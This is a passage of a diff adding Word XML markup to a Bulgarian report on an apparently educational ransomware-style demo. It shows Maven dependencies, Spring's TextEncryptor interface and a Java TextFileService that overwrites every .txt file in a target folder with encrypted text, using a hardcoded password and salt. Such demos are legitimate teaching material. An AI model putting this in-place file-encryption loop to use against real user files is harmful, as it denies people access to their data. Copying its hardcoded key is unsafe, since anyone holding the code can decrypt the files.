+        <w:t xml:space="preserve">Използвани са следните </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dependencies:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;dependencies&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>groupId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>org.springframework.security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>groupId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>artifactId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;spring-security-crypto&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>artifactId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;version&gt;6.4.2&lt;/version&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    &lt;/dependency&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>groupId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>org.projectlombok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>groupId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>artifactId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lombok</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>artifactId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;version&gt;1.18.36&lt;/version&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;scope&gt;provided&lt;/scope&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    &lt;/dependency&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>groupId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ch.qos.logback</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>groupId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>artifactId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>logback</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-classic&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>artifactId</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">        &lt;version&gt;1.5.16&lt;/version&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    &lt;/dependency&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>&lt;/dependencies&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">(Фиг. 7 – Модел на заплахите в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="16" w:name="_Toc223382614"/>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pom.xml</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="16"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>От</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>pring-security-crypto</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">е използван интерфейса </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и класа </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Encryptors</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Интерфейсът се използва за симетрично криптиране на стрингове.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">public interface </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">String </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>encrypt(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>String text);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">String decrypt(String </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encryptedText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Интерфейс </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+        <w:keepNext/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">public static </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>text(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>CharSequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> password, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CharSequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> salt) {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    return new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HexEncodingTextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>standard</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(password, salt));</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Фигура </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:t>: Метод от класа, която се използва в демото</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">Използва </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password-based</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> криптиране, като се генерира ключ от паролата и солта. Паролата не трябва да бъде споделяне с никога, но в нашето демо е показана за демонстративни цели. Солта е произволна стойност за защита срещу </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rainbow table </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">атаки. Криптира текста и го връща като </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hex </w:t>
+      </w:r>
+      <w:r>
+        <w:t>низ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Създаден е клас </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TextFileService</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>който се използва да прочете и криптира/декриптира горепосочените три текстови файла.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>@Slf4j</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">public class </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TextFileService</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    private static final String </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">SUFFIX </w:t>
+      </w:r>
+      <w:r>
+        <w:t>= ".txt";</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    private static final Path </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">TARGET_FOLDER </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Path.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>target_files</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>");</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    private static final String </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">PASSWORD </w:t>
+      </w:r>
+      <w:r>
+        <w:t>= "SPOOKY_SECRET_ATTACK";</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    private static final String </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">SALT </w:t>
+      </w:r>
+      <w:r>
+        <w:t>= "abcdef1234567890";</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    private final </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>TextEncryptor</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> encryptor = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Encryptors.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>PASSWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>SALT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="bg-BG"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="code"/>
+      </w:pPr>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    public void </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encryptAll</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">() throws </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IOException</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       for (var file : </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getTxtFiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>()) {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          var content = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Files.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>readString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file.toPath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>());</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          var encrypted = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encryptor.encrypt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(content);</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Files.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>writeString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file.toPath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(), encrypted);</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>log</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.info("[ENCRYPTED] {}", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file.getName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>());</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       }</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    public void </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decryptAll</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">() throws </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IOException</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       for (var file : </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getTxtFiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>()) {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          var content = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Files.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>readString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file.toPath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>());</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          var decrypted = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encryptor.decrypt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(content);</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Files.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>writeString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file.toPath</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(), decrypted);</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">          </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>log</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.info("[DECRYPTED] {}", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>file.getName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>());</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       }</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">    private List&lt;File&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getTxtFiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>() {</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       var files = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>TARGET_FOLDER</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.toFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>listFiles</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">             (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, name) -&gt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>name.endsWith</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>SUFFIX</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       );</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">       return files != null ? </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Arrays.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>asList</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">(files): </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>List.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
